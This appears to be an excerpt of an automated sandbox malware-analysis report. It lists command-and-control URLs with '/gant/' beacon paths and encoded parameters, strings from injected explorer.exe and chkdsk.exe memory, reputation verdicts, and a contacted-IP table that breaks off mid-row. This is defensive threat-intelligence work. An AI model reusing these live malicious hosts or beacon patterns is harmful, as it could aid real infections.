                                                            http://www.lakeviewautomation.com/gant/?j-Jh9P=lG1MXAoVmwgOpPlDaO5uOCVJTMHwk/fdWy8fBrW3vMUx4Eu1HaIGqjrCYnGNSU+uIBrfqi0XYB7pKAHIVdBFrPjvfY3MgrPiTA==&T9=bPxTYTKdI2true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.performingartshub.co.uk/gant/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.brothersbears.com/gant/true
                                                            • Avira URL Cloud: phishing
                                                            		unknown
                                                            https://doc-10-2g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0fultl13jo81v7hfp988qo08b984m263/1676311050000/07588391332409747894/*/1kMGYAplkbjctjdnlsJTgbdkYzAHnVHuE?e=download&uuid=0b7f7b61-8846-47e3-a792-0fa9790c296cfalse
                                                              		high
                                                              http://www.dachmotors.com/gant/?j-Jh9P=B0pNFIyvfWNbMZ+y1M/LgZADusV71feeQe6W+GB1ssl6KD/NibUunE4IvTatYpRgFtRcLWhob4pstpOdFq/XGd2nPwIBJf7TLg==&T9=bPxTYTKdI2true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.otopodlogi.com/gant/?j-Jh9P=2tUZKRHByxlttwUxv+GOcisphN8ZGwJH956H6V+vFw98R8B9R+q1qFuRbo6W7NeIxARixWcpsfkmwl3+P8H59+TtZSMQFDV9NQ==&T9=bPxTYTKdI2true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.hotelyeah.top/gant/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.treebarktees.com/gant/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.otopodlogi.com/gant/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.flyshareinc.com/gant/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.sciencevale.xyz/gant/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.grenoble-informatique.com/gant/?j-Jh9P=2JL3CIBt3IC0PgoAudQ1L9Eb6D+VDac3U4mviwi6NXYkyXwKlhT1jupAATRxZoEWPtU5/NPFAf7q3b9zYMRU8+5k3iEXReAvBw==&T9=bPxTYTKdI2true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.thejointcomission.org/gant/?j-Jh9P=MQtjD5X22poUyMv7ES4tvtca33r9y2dLYuXFkx7pCBQejezRhizA21G5ExCHCl6M5sdibhXBm0qE1VdFv4a9rmk6iqpvFYiiMw==&T9=bPxTYTKdI2true
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.lakeviewautomation.com/gant/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.hotelyeah.top/gant/?j-Jh9P=/4uePDAndv7VRKlxJSWWYF+9JWnpnxC+Pqu0glR/gWphXDvAzD/IhhQUyrVK/VMLXFR13n1QlAsq5EiJSOA8G9jIKMVd5okpcw==&T9=bPxTYTKdI2true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.performingartshub.co.uk/gant/?j-Jh9P=UNNYdcSQH8G7azuEeyjHGvIpwoKghrgSH3Udh5NSOmta1bwA4yZMM4UvAxe/iGptPmuGT4M6JuNJB68yuzE0hMzX7pwOCu8H8A==&T9=bPxTYTKdI2true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.sciencevale.xyz/gant/?j-Jh9P=0t3ZvwpEqVsRCOwRlikXMWB7Ea95BZez04foFL6wYLCqffSg77P+YtyukHRVRGclol71et68nIyUJ+scOlPmXgSdPrpnjIlS4g==&T9=bPxTYTKdI2true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.dachmotors.com/gant/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.thejointcomission.org/gant/true
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.grenoble-informatique.com/gant/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.cc564966.com/gant/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.cc564966.com/gant/?j-Jh9P=gtmxM9sVToXKjMyTASxBPF0sq9AFFQGD43p7DhxGmNljyvBNaufr2S5kOWNcewkSSruZtMGwxAitLcOH1ReRcd40xShNtBsThw==&T9=bPxTYTKdI2true
                                                              • Avira URL Cloud: safe
                                                              		unknown

                                                              URLs from Memory and Binaries

                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              https://duckduckgo.com/chrome_newtabchkdsk.exe, 00000016.00000002.7457453939.0000000009C29000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7457453939.0000000009BBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchchkdsk.exe, 00000016.00000002.7457453939.0000000009C29000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7457453939.0000000009BBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.ixirwholesale.xyzReferer:explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://duckduckgo.com/ac/?q=chkdsk.exe, 00000016.00000002.7457453939.0000000009BBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://lakeviewautomation.com/wp-content/plugins/under-construction-page/themes/css/common.css?v=3.9explorer.exe, 00000015.00000002.7501684681.0000000014A72000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7457324652.0000000008120000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://lakeviewautomation.com/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.csexplorer.exe, 00000015.00000002.7501684681.0000000014A72000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7457324652.0000000008120000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000015.00000000.3329042702.0000000004E24000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7457215563.0000000004E24000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://api.msn.com:443/v1/news/Feed/Windows?rexplorer.exe, 00000015.00000003.4925571910.00000000106AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4217695794.00000000106AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.6278163280.00000000106AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.6463904770.00000000106B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4910827069.00000000106AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.6449975060.00000000106AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7494297654.00000000106B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.3361689711.00000000106AE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://android.notify.windows.com/iOSNexplorer.exe, 00000015.00000002.7457215563.0000000004E24000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://mscrl.microexplorer.exe, 00000015.00000000.3363239963.00000000106FA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://deff.nelreports.net/api/report?cat=msnexplorer.exe, 00000015.00000000.3361689711.00000000105D9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://wns.windows.com/wJQexplorer.exe, 00000015.00000002.7461360082.0000000009060000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://lakeviewautomation.com/wp-content/plugins/under-construction-page/themes/closed/style.css?v=3explorer.exe, 00000015.00000002.7501684681.0000000014A72000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7457324652.0000000008120000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.flyshareinc.comReferer:explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.performingartshub.co.ukexplorer.exe, 00000015.00000002.7487805404.000000000DE90000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.thejointcomission.orgexplorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrantexplorer.exe, 00000015.00000000.3329042702.0000000004E24000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7457215563.0000000004E24000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.brothersbears.com/?fp=B0INY8snl8mw%2BcAJH72nUzYVCaUxbDaGdZbUB3wx2UlG%2BELJV8E7p0rxWg6dgbHchkdsk.exe, 00000016.00000002.7454580415.0000000006D68000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: phishing
                                                                              		unknown
                                                                              https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=chkdsk.exe, 00000016.00000002.7457453939.0000000009C29000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7457453939.0000000009BBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.touchdress.siteexplorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                https://fonts.bunny.net/css?family=Fredokaexplorer.exe, 00000015.00000002.7501684681.0000000014A72000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7457324652.0000000008120000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://word.office.comxexplorer.exe, 00000015.00000003.4198007620.000000000D15A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4194013776.000000000D15A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7484031378.000000000D15A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.6455162737.000000000D17E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.3351686119.000000000D15A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.2607012213.000001A4BCB91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://android.notify.windows.com/iOSder7explorer.exe, 00000015.00000002.7457215563.0000000004E24000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.japurima.comexplorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svgexplorer.exe, 00000015.00000000.3329042702.0000000004E24000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7457215563.0000000004E24000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://lakeviewautomation.com/wp-login.phpexplorer.exe, 00000015.00000002.7501684681.0000000014A72000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7457324652.0000000008120000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filminexplorer.exe, 00000015.00000000.3329042702.0000000004E24000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7457215563.0000000004E24000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.japurima.comReferer:explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://aka.ms/odirm:explorer.exe, 00000015.00000002.7463495574.00000000091B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.3333082265.00000000091B3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.gargaloid.ru/gant/explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.otopodlogi.comReferer:explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppSEEexplorer.exe, 00000015.00000002.7447578787.0000000002C10000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/explorer.exe, 00000015.00000000.3329042702.0000000004E24000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7457215563.0000000004E24000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://lakeviewautomation.com/wp-content/plugins/under-construction-page/themes/closed/closed.pngexplorer.exe, 00000015.00000002.7501684681.0000000014A72000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7457324652.0000000008120000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=chkdsk.exe, 00000016.00000002.7457453939.0000000009BBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.dachmotors.comReferer:explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.brothersbears.comReferer:explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://outlook.comexplorer.exe, 00000015.00000003.4198007620.000000000D15A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4194013776.000000000D15A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7484031378.000000000D15A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.6455162737.000000000D17E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.3351686119.000000000D15A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&oexplorer.exe, 00000015.00000000.3329042702.0000000004E24000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7457215563.0000000004E24000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.sciencevale.xyzexplorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://www.gargaloid.ruexplorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://www.thejointcomission.orgReferer:explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://android.notify.windows.com/iOSexplorer.exe, 00000015.00000002.7457215563.0000000004E24000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.b-yy.xyz/gant/explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: phishing
                                                                                                      		unknown
                                                                                                      http://www.lakeviewautomation.comReferer:explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://www.redystedy.com/gant/explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://www.ixirwholesale.xyzexplorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://treebarktees.com/gant/?j-Jh9P=TyiG4SYT4QZjW5cpsFN/2IY0LPBGgIfJh6ADM61dYWsbGNZtiA4uKO4tvwXfoLZexplorer.exe, 00000015.00000002.7501684681.00000000145BC000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7454580415.00000000063FC000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://www.redystedy.comReferer:explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://www.cc564966.comReferer:explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://www.cutgang.netReferer:explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://www.jewelryimpact.com/gant/explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://www.jewelryimpact.comReferer:explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://www.versusfinances.techReferer:explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://dts.gnpge.comchkdsk.exe, 00000016.00000002.7454580415.0000000006D68000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://www.dachmotors.comexplorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://www.cutgang.net/gant/explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://www.cutgang.net/chkdsk.exe, 00000016.00000002.7457453939.0000000009C40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://api.whatsapp.com/send?phone=2348166843763explorer.exe, 00000015.00000002.7501684681.0000000014A72000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7457324652.0000000008120000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.grenoble-informatique.comReferer:explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.brothersbears.comexplorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: phishing
                                                                                                        		unknown
                                                                                                        http://schemas.microexplorer.exe, 00000015.00000002.7469037835.00000000096C0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000015.00000000.3339772093.000000000A3E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000015.00000000.3320672083.0000000002330000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.cutgang.netexplorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.sciencevale.xyzReferer:explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.ixirwholesale.xyz/gant/explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.versusfinances.techexplorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.hotelyeah.topexplorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.redystedy.comexplorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.flyshareinc.comexplorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.grenoble-informatique.comexplorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://dachmotors.com/gant/?j-Jh9P=B0pNFIyvfWNbMZexplorer.exe, 00000015.00000002.7501684681.0000000015894000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7454580415.00000000076D4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.otopodlogi.comexplorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://api.msn.com/v1/news/Feed/Windows?Mexplorer.exe, 00000015.00000002.7494938106.00000000106D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4217695794.00000000106AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.6278163280.00000000106AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.6469892848.00000000106D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.6463904770.00000000106B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.6449975060.00000000106AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4218507424.00000000106D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.3361689711.00000000106AE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://crash-reports.mozilla.com/submit?id=chkdsk.exe, 00000016.00000003.3608146584.0000000009C90000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000003.3660964442.000000000A365000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icochkdsk.exe, 00000016.00000002.7457453939.0000000009BBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.gargaloid.ruReferer:explorer.exe, 00000015.00000003.4913976228.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.0000000009277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7463495574.0000000009277000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://www.litespeedtech.com/error-pageexplorer.exe, 00000015.00000002.7501684681.000000001524C000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7454580415.000000000708C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                		high

                                                                                                                World Map of Contacted IPs

                                                                                                                • No. of IPs < 25%
                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                • 75% < No. of IPs

                                                                                                                Public IPs

                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                142.250.186.46
                                                                                                                		drive.google.comUnited States
                                                                                                                		15169GOOGLEUSfalse
                                                                                                                142.44.131.177
